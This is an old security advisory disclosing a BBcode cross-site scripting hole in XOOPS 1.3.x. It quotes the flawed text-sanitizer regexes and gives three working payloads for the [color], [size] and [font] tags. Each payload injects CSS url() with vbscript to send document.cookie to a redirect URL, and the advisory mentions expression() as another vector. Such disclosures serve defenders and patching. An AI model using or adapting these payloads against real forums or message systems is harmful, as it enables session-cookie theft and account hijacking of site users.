|
Informations : °°°°°°°°°°°°° Language : PHP Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked) Safe Version : 2.0.3 Website : http://www.xoops.org Problem : BBcode XSS PHP Code/Location : °°°°°°°°°°°°°°°°°°° This hole can be used in modules : - Private Messages - News - NewBB (forum) class/module/textsanitizer.php : --------------------------------------------------------------------------------------- [...] function xoopsCodeDecode($text){ $patterns = array(); $replacements = array(); [...] $patterns[] = "/\[color=(['\"]?)([^\"']*)\\1](.*)\[\/color\]/sU"; $replacements[] = "<span style='color: #\\2;'>\\3</span>"; $patterns[] = "/\[size=(['\"]?)([^\"']*)\\1](.*)\[\/size\]/sU"; $replacements[] = "<span style='font-size: \\2;'>\\3</span>"; $patterns[] = "/\[font=(['\"]?)([^\"']*)\\1](.*)\[\/font\]/sU"; $replacements[] = "<span style='font-family: \\2;'>\\3</span>"; [...] $text = preg_replace($patterns, $replacements, $text); [...] return $text; } [...] function oopsHtmlSpecialChars($text) { $text = htmlspecialchars($text); $text = str_replace("'","'",$text); return $text; } [...] --------------------------------------------------------------------------------------- Exploit : °°°°°°° ----------------------------------------------------------------------------------------------------------------------------- [color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color] [size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size] [font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font] ----------------------------------------------------------------------------------------------------------------------------- function url() from style tag (css) and vbscript are used here to redirect to the url "abcdef" + the cookie with the bbcode tags [color] [size] and [font]. Another style function that could be used is expression(). Patch : °°°°°° Just download the las version of XOOPS (2.0.3). frog-m@n http://www.phpsecure.info _________________________________________________________________